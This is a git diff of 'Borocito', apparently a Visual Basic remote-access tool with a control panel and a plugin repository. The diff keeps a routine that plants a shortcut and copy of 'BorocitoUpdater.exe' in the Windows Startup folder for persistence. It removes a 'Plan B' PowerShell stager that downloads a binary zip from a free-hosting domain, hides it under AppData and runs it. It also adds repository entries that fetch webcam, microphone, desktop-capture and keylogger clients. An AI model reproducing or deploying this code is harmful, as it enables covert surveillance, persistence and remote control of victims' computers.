diff --git a/Borocito/My Project/AssemblyInfo.vb b/Borocito/My Project/AssemblyInfo.vb index ef5dce6..133221c 100644 --- a/Borocito/My Project/AssemblyInfo.vb +++ b/Borocito/My Project/AssemblyInfo.vb @@ -33,5 +33,5 @@ Imports System.Runtime.InteropServices ' - + diff --git a/Borocito/Utility.vb b/Borocito/Utility.vb index 54f85f6..cabd224 100644 --- a/Borocito/Utility.vb +++ b/Borocito/Utility.vb @@ -11,7 +11,7 @@ Module GlobalUses Public HttpOwnerServer As String Public compileVersion As String = My.Application.Info.Version.ToString & " (" & Application.ProductVersion & ") " & - "[07/06/2022 15:56]" 'Indicacion exacta de la ultima compilacion + "[26/11/2022 19:08]" 'Indicacion exacta de la ultima compilacion End Module '<--- ACTUALIZAR DATOS Module Utility Public tlmContent As String @@ -671,11 +671,12 @@ Module Network Extractor() ElseIf command.StartsWith("/SendTelemetry") Then 'Funciona. - Return "Sending located telemetry..." AddToLog("Network", "Borocito has been called to send telemetry!", True) SendTelemetry() + Return "Sending located telemetry..." ElseIf command.StartsWith("/Heartbeat") Then 'Funciona. + AddToLog("Network", "Hey, Im here!", True) Return "---/\--- (Pum pum...)" & vbCrLf & "[VARIABLES]" & vbCrLf & compileVersion & @@ -698,7 +699,6 @@ Module Network My.Computer.Info.AvailableVirtualMemory & "/" & My.Computer.Info.TotalPhysicalMemory & "/" & My.Computer.Info.TotalVirtualMemory - AddToLog("Network", "Hey, Im here!", True) ElseIf command.StartsWith("/Status") Then 'Funciona. Return My.Application.Info.AssemblyName & " v" & My.Application.Info.Version.ToString & " (" & Application.ProductVersion & "). Running in " & Environment.UserDomainName & "\" & Environment.UserName @@ -775,4 +775,14 @@ Module Network AddToLog("ConfigFiles@Network", "Error: " & ex.Message, True) End Try End Sub +End Module +Module Boro_Comm + 'BORO-COMM es el nuevo sistema de comunicacion Servidor-Cliente-Servidor + 'Utiliza el (proximo) complemento Boro-Comm para realizar la tarea de comunicar con algun proveedor de comandos + 'Como: + ' Firebase by Google + ' Realtime Database + ' TCP/IP (for Local network or Wordwide) + ' IDFTP (Actual system) + ' Another (Custom, developer by You or others...) End Module \ No newline at end of file diff --git a/Control/Main.Designer.vb b/Control/Main.Designer.vb index b3a84a3..cef10a6 100644 --- a/Control/Main.Designer.vb +++ b/Control/Main.Designer.vb @@ -71,6 +71,12 @@ Partial Class Main Me.TextBox2 = New System.Windows.Forms.TextBox() Me.Label9 = New System.Windows.Forms.Label() Me.PictureBox1 = New System.Windows.Forms.PictureBox() + Me.ContextMenuPrincipal = New System.Windows.Forms.ContextMenuStrip(Me.components) + Me.RecargarTodoToolStripMenuItem = New System.Windows.Forms.ToolStripMenuItem() + Me.ToolStripMenuItem3 = New System.Windows.Forms.ToolStripSeparator() + Me.ConfiguracionToolStripMenuItem = New System.Windows.Forms.ToolStripMenuItem() + Me.ToolStripMenuItem4 = New System.Windows.Forms.ToolStripSeparator() + Me.SalirToolStripMenuItem = New System.Windows.Forms.ToolStripMenuItem() Me.Label1 = New System.Windows.Forms.Label() Me.Label2 = New System.Windows.Forms.Label() Me.Label3 = New System.Windows.Forms.Label() @@ -79,12 +85,6 @@ Partial Class Main Me.Label_Loading_Panel = New System.Windows.Forms.Label() Me.Panel1 = New System.Windows.Forms.Panel() Me.CheckBox2 = New System.Windows.Forms.CheckBox() - Me.ContextMenuPrincipal = New System.Windows.Forms.ContextMenuStrip(Me.components) - Me.RecargarTodoToolStripMenuItem = New System.Windows.Forms.ToolStripMenuItem() - Me.ToolStripMenuItem3 = New System.Windows.Forms.ToolStripSeparator() - Me.ConfiguracionToolStripMenuItem = New System.Windows.Forms.ToolStripMenuItem() - Me.ToolStripMenuItem4 = New System.Windows.Forms.ToolStripSeparator() - Me.SalirToolStripMenuItem = New System.Windows.Forms.ToolStripMenuItem() Me.TabControl1.SuspendLayout() Me.TabPage1.SuspendLayout() Me.TabControl3.SuspendLayout() @@ -107,8 +107,8 @@ Partial Class Main Me.TabPage6.SuspendLayout() Me.GroupBox3.SuspendLayout() CType(Me.PictureBox1, System.ComponentModel.ISupportInitialize).BeginInit() - Me.Panel1.SuspendLayout() Me.ContextMenuPrincipal.SuspendLayout() + Me.Panel1.SuspendLayout() Me.SuspendLayout() ' 'TabControl1 @@ -312,7 +312,7 @@ Partial Class Main Or System.Windows.Forms.AnchorStyles.Right), System.Windows.Forms.AnchorStyles) Me.RichTextBox1.Location = New System.Drawing.Point(173, 32) Me.RichTextBox1.Name = "RichTextBox1" - Me.RichTextBox1.Size = New System.Drawing.Size(562, 184) + Me.RichTextBox1.Size = New System.Drawing.Size(556, 184) Me.RichTextBox1.TabIndex = 3 Me.RichTextBox1.Text = "" ' @@ -605,6 +605,41 @@ Partial Class Main Me.PictureBox1.TabIndex = 1 Me.PictureBox1.TabStop = False ' + 'ContextMenuPrincipal + ' + Me.ContextMenuPrincipal.Items.AddRange(New System.Windows.Forms.ToolStripItem() {Me.RecargarTodoToolStripMenuItem, Me.ToolStripMenuItem3, Me.ConfiguracionToolStripMenuItem, Me.ToolStripMenuItem4, Me.SalirToolStripMenuItem}) + Me.ContextMenuPrincipal.Name = "ContextMenuPrincipal" + Me.ContextMenuPrincipal.Size = New System.Drawing.Size(151, 82) + ' + 'RecargarTodoToolStripMenuItem + ' + Me.RecargarTodoToolStripMenuItem.Name = "RecargarTodoToolStripMenuItem" + Me.RecargarTodoToolStripMenuItem.Size = New System.Drawing.Size(150, 22) + Me.RecargarTodoToolStripMenuItem.Text = "Recargar todo" + ' + 'ToolStripMenuItem3 + ' + Me.ToolStripMenuItem3.Name = "ToolStripMenuItem3" + Me.ToolStripMenuItem3.Size = New System.Drawing.Size(147, 6) + ' + 'ConfiguracionToolStripMenuItem + ' + Me.ConfiguracionToolStripMenuItem.Enabled = False + Me.ConfiguracionToolStripMenuItem.Name = "ConfiguracionToolStripMenuItem" + Me.ConfiguracionToolStripMenuItem.Size = New System.Drawing.Size(150, 22) + Me.ConfiguracionToolStripMenuItem.Text = "Configuracion" + ' + 'ToolStripMenuItem4 + ' + Me.ToolStripMenuItem4.Name = "ToolStripMenuItem4" + Me.ToolStripMenuItem4.Size = New System.Drawing.Size(147, 6) + ' + 'SalirToolStripMenuItem + ' + Me.SalirToolStripMenuItem.Name = "SalirToolStripMenuItem" + Me.SalirToolStripMenuItem.Size = New System.Drawing.Size(150, 22) + Me.SalirToolStripMenuItem.Text = "Salir" + ' 'Label1 ' Me.Label1.AutoSize = True @@ -679,6 +714,7 @@ Partial Class Main ' 'CheckBox2 ' + Me.CheckBox2.Anchor = CType((System.Windows.Forms.AnchorStyles.Bottom Or System.Windows.Forms.AnchorStyles.Right), System.Windows.Forms.AnchorStyles) Me.CheckBox2.AutoSize = True Me.CheckBox2.Cursor = System.Windows.Forms.Cursors.Hand Me.CheckBox2.Location = New System.Drawing.Point(699, 448) @@ -688,41 +724,6 @@ Partial Class Main Me.CheckBox2.Text = "Modo oscuro" Me.CheckBox2.UseVisualStyleBackColor = True ' - 'ContextMenuPrincipal - ' - Me.ContextMenuPrincipal.Items.AddRange(New System.Windows.Forms.ToolStripItem() {Me.RecargarTodoToolStripMenuItem, Me.ToolStripMenuItem3, Me.ConfiguracionToolStripMenuItem, Me.ToolStripMenuItem4, Me.SalirToolStripMenuItem}) - Me.ContextMenuPrincipal.Name = "ContextMenuPrincipal" - Me.ContextMenuPrincipal.Size = New System.Drawing.Size(151, 82) - ' - 'RecargarTodoToolStripMenuItem - ' - Me.RecargarTodoToolStripMenuItem.Name = "RecargarTodoToolStripMenuItem" - Me.RecargarTodoToolStripMenuItem.Size = New System.Drawing.Size(150, 22) - Me.RecargarTodoToolStripMenuItem.Text = "Recargar todo" - ' - 'ToolStripMenuItem3 - ' - Me.ToolStripMenuItem3.Name = "ToolStripMenuItem3" - Me.ToolStripMenuItem3.Size = New System.Drawing.Size(147, 6) - ' - 'ConfiguracionToolStripMenuItem - ' - Me.ConfiguracionToolStripMenuItem.Enabled = False - Me.ConfiguracionToolStripMenuItem.Name = "ConfiguracionToolStripMenuItem" - Me.ConfiguracionToolStripMenuItem.Size = New System.Drawing.Size(150, 22) - Me.ConfiguracionToolStripMenuItem.Text = "Configuracion" - ' - 'ToolStripMenuItem4 - ' - Me.ToolStripMenuItem4.Name = "ToolStripMenuItem4" - Me.ToolStripMenuItem4.Size = New System.Drawing.Size(147, 6) - ' - 'SalirToolStripMenuItem - ' - Me.SalirToolStripMenuItem.Name = "SalirToolStripMenuItem" - Me.SalirToolStripMenuItem.Size = New System.Drawing.Size(150, 22) - Me.SalirToolStripMenuItem.Text = "Salir" - ' 'Main ' Me.AutoScaleDimensions = New System.Drawing.SizeF(6.0!, 13.0!) @@ -770,8 +771,8 @@ Partial Class Main Me.GroupBox3.ResumeLayout(False) Me.GroupBox3.PerformLayout() CType(Me.PictureBox1, System.ComponentModel.ISupportInitialize).EndInit() - Me.Panel1.ResumeLayout(False) Me.ContextMenuPrincipal.ResumeLayout(False) + Me.Panel1.ResumeLayout(False) Me.ResumeLayout(False) Me.PerformLayout() diff --git a/Control/Main.vb b/Control/Main.vb index 99485de..c7e8e5c 100644 --- a/Control/Main.vb +++ b/Control/Main.vb @@ -142,7 +142,9 @@ Public Class Main Sub SetCMDStatus(ByVal response As String, ByVal status As String, Optional ByVal ScrollRichBox As Boolean = True) Try If response <> Nothing Then + RichTextBox2.SelectionColor = Color.Lime RichTextBox2.AppendText(response) + RichTextBox2.SelectionColor = Color.LimeGreen End If Label_Status.Text = status If ScrollRichBox Then diff --git a/Extractor/My Project/AssemblyInfo.vb b/Extractor/My Project/AssemblyInfo.vb index ec3161b..adda77c 100644 --- a/Extractor/My Project/AssemblyInfo.vb +++ b/Extractor/My Project/AssemblyInfo.vb @@ -32,4 +32,4 @@ Imports System.Runtime.InteropServices ' - + diff --git a/Extractor/Resources/Borocito.exe b/Extractor/Resources/Borocito.exe index 0359d16..b2fcfa2 100644 Binary files a/Extractor/Resources/Borocito.exe and b/Extractor/Resources/Borocito.exe differ diff --git a/Extractor/Utility.vb b/Extractor/Utility.vb index f0c52f4..a230e4d 100644 --- a/Extractor/Utility.vb +++ b/Extractor/Utility.vb @@ -134,24 +134,6 @@ Module Extractor AddToLog("SetExistence@Extractor", "Error: " & ex.Message, True) End Try End Sub - Sub StartWithWindows() - Try - AddToLog("StartWithWindows@StartUp", "Making Borocito start with Windows...", False) - Dim StartupShortcut As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\Updater.lnk" - If My.Computer.FileSystem.FileExists(StartupShortcut) = False Then - Dim WSHShell As Object = CreateObject("WScript.Shell") - Dim Shortcut As Object = WSHShell.CreateShortcut(StartupShortcut) - Shortcut.IconLocation = DIRCommons & "\BorocitoUpdater.exe,0" - Shortcut.TargetPath = DIRCommons & "\BorocitoUpdater.exe" - Shortcut.WindowStyle = 1 - Shortcut.Description = "Updater software for Borocito" - Shortcut.Save() - My.Computer.FileSystem.CopyFile(DIRCommons & "\BorocitoUpdater.exe", Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\Updater.exe") - End If - Catch ex As Exception - AddToLog("StartWithWindows@Extractor", "Error: " & ex.Message, True) - End Try - End Sub Sub StartExtract() Try AddToLog("StartExtract@StartUp", "Inicializando Extractor...", False) @@ -199,12 +181,31 @@ Module Extractor AddToLog("StartExtract@Extractor", "Error: " & ex.Message, True) End Try End Sub + Sub StartWithWindows() + Try + AddToLog("StartWithWindows@StartUp", "Making Borocito start with Windows...", False) + Dim StartupShortcut As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\Updater.lnk" + If My.Computer.FileSystem.FileExists(StartupShortcut) = False Then + Dim WSHShell As Object = CreateObject("WScript.Shell") + Dim Shortcut As Object = WSHShell.CreateShortcut(StartupShortcut) + Shortcut.IconLocation = DIRCommons & "\BorocitoUpdater.exe,0" + Shortcut.TargetPath = DIRCommons & "\BorocitoUpdater.exe" + Shortcut.WindowStyle = 1 + Shortcut.Description = "Updater software for Borocito" + Shortcut.Save() + My.Computer.FileSystem.CopyFile(DIRCommons & "\BorocitoUpdater.exe", Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\Updater.exe") + End If + Catch ex As Exception + AddToLog("StartWithWindows@Extractor", "Error: " & ex.Message, True) + End Try + End Sub Sub InitUpdater() Try AddToLog("InitUpdater@StartUp", "Iniciando Updater...", False) Process.Start(DIRCommons & "\BorocitoUpdater.exe") - Dim threadMonitoring = New Threading.Thread(Sub() Monitoring("Boro Defender System", 120000)) - threadMonitoring.Start() + 'Dim threadMonitoring = New Threading.Thread(Sub() Monitoring("Boro Defender System", 120000)) + 'threadMonitoring.Start() + End Catch ex As Exception AddToLog("InitAll@Extractor", "Error: " & ex.Message, True) End Try @@ -220,71 +221,23 @@ Module Extractor End Else ' Process is not running - AddToLog("Monitoring", "The proccess is not running! Plan B...", False) - 'plan b + AddToLog("Monitoring", "The proccess is not running! Starting...", False) + SecondStage() End If End While Catch ex As Exception AddToLog("Monitoring@Extractor", "Error: " & ex.Message, True) End Try End Sub - Sub PlanB() + Sub SecondStage() Try - AddToLog("Extractor", "Inicializing Plan B", False) - Dim filePath As String = DIRTemp & "\Extractor.ps1" - Dim contenido As String = "Add-Type -AssemblyName System.IO.Compression.FileSystem" & - vbCrLf & "function AddToLog {" & - vbCrLf & " param (" & - vbCrLf & " [string]$contentMsg" & - vbCrLf & " )" & - vbCrLf & " Write-Host $contentMsg" & - vbCrLf & " Start-Sleep -Seconds 1.5" & - vbCrLf & "}" & - vbCrLf & "AddToLog 'Inicializing the installer...'" & - vbCrLf & "AddToLog 'Seting variables...'" & - vbCrLf & "$ownerServer = 'safedomainfrominternet.atwebpages.com/Borocito'" & - vbCrLf & "AddToLog() 'Seting needed variables...'" & - vbCrLf & "$hostServer = 'http://' + $ownerServer" & - vbCrLf & "$binariesZip = $hostServer + '/Borocitos.cph'" & - vbCrLf & "$DIRCommons = -join('C:\Users\',[System.Environment]::UserName,'\AppData\Local\Microsoft\Borocito')" & - vbCrLf & "$outputZip = $DIRCommons + '\Borocitos.zip'" & - vbCrLf & "$runPacket = $DIRCommons + '\BorocitoUpdater.exe'" & - vbCrLf & "AddToLog() 'Starting...'" & - vbCrLf & "AddToLog() 'Checking registry...'" & - vbCrLf & "If (Test-Path 'HKCU:\SOFTWARE\Borocito') {" & - vbCrLf & " AddToLog 'The registry already exist!'" & - vbCrLf & "}else {" & - vbCrLf & " AddToLog 'The registry doesnt exist! Creating...'" & - vbCrLf & " New-Item -Path 'HKCU:\SOFTWARE' -Name Borocito" & - vbCrLf & " New-ItemProperty -Path 'HKCU:\SOFTWARE\Borocito' -Name 'OwnerServer' -Value $ownerServer -PropertyType 'String'" & - vbCrLf & "}" & - vbCrLf & "New-Item $DIRCommons -ItemType Directory" & - vbCrLf & "AddToLog ([string]::Format('Downloading zip binaries...`n From: {0}`n To: {1}', $binariesZip,$outputZip))" & - vbCrLf & "$webClient = [System.Net.WebClient]::new()" & - vbCrLf & "$webClient.DownloadFile($binariesZip, $outputZip)" & - vbCrLf & "AddToLog ([string]::Format('Extracting zip binaries...`n From: {0}`n To: {1}', $outputZip,$DIRCommons))" & - vbCrLf & "[System.IO.Compression.ZipFile]::ExtractToDirectory($outputZip, $DIRCommons)" & - vbCrLf & "AddToLog 'Starting the packet...'" & - vbCrLf & "AddToLog ([string]::Format('Starting packet......`n Packet: {0}', $runPacket))" & - vbCrLf & "Start-Process -FilePath $runPacket" & - vbCrLf & "AddToLog 'Exiting...'" & - vbCrLf & "Exit" - If My.Computer.FileSystem.FileExists(filePath) Then - My.Computer.FileSystem.DeleteFile(filePath) - End If + AddToLog("Extractor", "Inicializing Second Stage...", False) - My.Computer.FileSystem.WriteAllText(filePath, contenido, False) - - AddToLog("Extractor", "Starting plan B...", False) - - Process.Start("powershell.exe", filePath) - - Threading.Thread.Sleep(5000) - - AddToLog("Extractor", "Closing...", False) + 'La idea es poder iniciar una instancia descargada desde internet. + 'Por esta razon, esta etapa no estara lista en algun tiempo. + AddToLog("Extractor", "Closing Second Stage...", False) End - Catch ex As Exception AddToLog("PlanB@Extractor", "Error: " & ex.Message, True) End Try diff --git a/Server Side/Boro-Get/REPO/RMTCAM_Client.zip b/Server Side/Boro-Get/REPO/RMTCAM_Client.zip new file mode 100644 index 0000000..3090be0 Binary files /dev/null and b/Server Side/Boro-Get/REPO/RMTCAM_Client.zip differ diff --git a/Server Side/Boro-Get/REPO/RMTDSK_Client.zip b/Server Side/Boro-Get/REPO/RMTDSK_Client.zip index f267df2..0783e32 100644 Binary files a/Server Side/Boro-Get/REPO/RMTDSK_Client.zip and b/Server Side/Boro-Get/REPO/RMTDSK_Client.zip differ diff --git a/Server Side/Boro-Get/REPO/RMTFS_Client.zip b/Server Side/Boro-Get/REPO/RMTFS_Client.zip index 9de5307..4d6fa3d 100644 Binary files a/Server Side/Boro-Get/REPO/RMTFS_Client.zip and b/Server Side/Boro-Get/REPO/RMTFS_Client.zip differ diff --git a/Server Side/Boro-Get/REPO/RMTMIC_Client.zip b/Server Side/Boro-Get/REPO/RMTMIC_Client.zip new file mode 100644 index 0000000..4fbabf9 Binary files /dev/null and b/Server Side/Boro-Get/REPO/RMTMIC_Client.zip differ diff --git a/Server Side/Boro-Get/REPO/broCiemdi.zip b/Server Side/Boro-Get/REPO/broCiemdi.zip new file mode 100644 index 0000000..4b3e716 Binary files /dev/null and b/Server Side/Boro-Get/REPO/broCiemdi.zip differ diff --git a/Server Side/Boro-Get/REPO/broScrincam.zip b/Server Side/Boro-Get/REPO/broScrincam.zip index 64cdbfe..5e4b808 100644 Binary files a/Server Side/Boro-Get/REPO/broScrincam.zip and b/Server Side/Boro-Get/REPO/broScrincam.zip differ diff --git a/Server Side/Boro-Get/RMTCAM.inf b/Server Side/Boro-Get/RMTCAM.inf new file mode 100644 index 0000000..2ea27c1 --- /dev/null +++ b/Server Side/Boro-Get/RMTCAM.inf @@ -0,0 +1,13 @@ +# Boro-Get RMTCAM Repo file +[GENERAL] +Author=Zhenboro +From=http://github.com/Zhenboro +[ASSEMBLY] +Name=RMTCAM_Client +Executable=RMTCAM_Client.exe +Version=1.0.0.0 +Web=https://github.com/Zhenboro/RMTCAM +[INSTALLER] +Binaries=https://chemic-jug.000webhostapp.com/Borocito/Boro-Get/REPO/RMTCAM_Client.zip +Installer=NULL +InstallFolder=%temp% \ No newline at end of file diff --git a/Server Side/Boro-Get/RMTDSK.inf b/Server Side/Boro-Get/RMTDSK.inf index 9d086e8..f8d1d7b 100644 --- a/Server Side/Boro-Get/RMTDSK.inf +++ b/Server Side/Boro-Get/RMTDSK.inf @@ -3,7 +3,7 @@ Author=Zhenboro From=http://github.com/Zhenboro [ASSEMBLY] -Name=RMTDSK +Name=RMTDSK_Client Executable=RMTDSK_Client.exe Version=1.1.0.0 Web=http://github.com/Zhenboro/RMTDSK diff --git a/Server Side/Boro-Get/RMTFS.inf b/Server Side/Boro-Get/RMTFS.inf index 6e32086..113955a 100644 --- a/Server Side/Boro-Get/RMTFS.inf +++ b/Server Side/Boro-Get/RMTFS.inf @@ -3,7 +3,7 @@ Author=Zhenboro From=http://github.com/Zhenboro [ASSEMBLY] -Name=RMTFS +Name=RMTMIC_Client Executable=RMTFS_Client.exe Version=1.0.0.0 Web=http://github.com/Zhenboro/RMTFS diff --git a/Server Side/Boro-Get/RMTMIC.inf b/Server Side/Boro-Get/RMTMIC.inf new file mode 100644 index 0000000..1c3c486 --- /dev/null +++ b/Server Side/Boro-Get/RMTMIC.inf @@ -0,0 +1,13 @@ +# Boro-Get RMTMIC Repo file +[GENERAL] +Author=Zhenboro +From=http://github.com/Zhenboro +[ASSEMBLY] +Name=RMTMIC_Client +Executable=RMTMIC_Client.exe +Version=1.0.0.0 +Web=https://github.com/Zhenboro/RMTMIC +[INSTALLER] +Binaries=https://chemic-jug.000webhostapp.com/Borocito/Boro-Get/REPO/RMTMIC_Client.zip +Installer=NULL +InstallFolder=%temp% \ No newline at end of file diff --git a/Server Side/Boro-Get/RepoList.ini b/Server Side/Boro-Get/RepoList.ini index 974aa8f..a5bd593 100644 --- a/Server Side/Boro-Get/RepoList.ini +++ b/Server Side/Boro-Get/RepoList.ini @@ -5,6 +5,8 @@ From=http://github.com/Zhenboro [REPOS] RMTDSK=https://chemic-jug.000webhostapp.com/Borocito/Boro-Get/RMTDSK.inf RMTFS=https://chemic-jug.000webhostapp.com/Borocito/Boro-Get/RMTFS.inf +RMTMIC=https://chemic-jug.000webhostapp.com/Borocito/Boro-Get/RMTMIC.inf +RMTCAM=https://chemic-jug.000webhostapp.com/Borocito/Boro-Get/RMTCAM.inf broKiloger=https://chemic-jug.000webhostapp.com/Borocito/Boro-Get/broKiloger.inf boro-hear=https://chemic-jug.000webhostapp.com/Borocito/Boro-Get/boro-hear.inf broScrincam=https://chemic-jug.000webhostapp.com/Borocito/Boro-Get/broScrincam.inf @@ -12,4 +14,5 @@ broRescue=https://chemic-jug.000webhostapp.com/Borocito/Boro-Get/broRescue.inf broReedit=https://chemic-jug.000webhostapp.com/Borocito/Boro-Get/broReedit.inf broMaintainer=https://chemic-jug.000webhostapp.com/Borocito/Boro-Get/broMaintainer.inf broArbitra=https://chemic-jug.000webhostapp.com/Borocito/Boro-Get/broArbitra.inf -broFaierwoll=https://chemic-jug.000webhostapp.com/Borocito/Boro-Get/broFaierwoll.inf \ No newline at end of file +broFaierwoll=https://chemic-jug.000webhostapp.com/Borocito/Boro-Get/broFaierwoll.inf +broCiemdi=https://chemic-jug.000webhostapp.com/Borocito/Boro-Get/broCiemdi.inf \ No newline at end of file diff --git a/Server Side/Boro-Get/broCiemdi.inf b/Server Side/Boro-Get/broCiemdi.inf new file mode 100644 index 0000000..aadcde0 --- /dev/null +++ b/Server Side/Boro-Get/broCiemdi.inf @@ -0,0 +1,13 @@ +# Boro-Get broCiemdi Repo file +[GENERAL] +Author=Zhenboro +From=http://github.com/Zhenboro +[ASSEMBLY] +Name=broCiemdi +Executable=broCiemdi.exe +Version=0.1.0.0 +Web=https://github.com/Zhenboro/borocito-components +[INSTALLER] +Binaries=https://chemic-jug.000webhostapp.com/Borocito/Boro-Get/REPO/broCiemdi.zip +Installer=NULL +InstallFolder=%temp% \ No newline at end of file diff --git a/Server Side/Borocito Server-Side.zip b/Server Side/Borocito Server-Side.zip index c435cb2..5d93451 100644 Binary files a/Server Side/Borocito Server-Side.zip and b/Server Side/Borocito Server-Side.zip differ diff --git a/Server Side/Borocitos.zip b/Server Side/Borocitos.zip index 5b24697..d8e8cf1 100644 Binary files a/Server Side/Borocitos.zip and b/Server Side/Borocitos.zip differ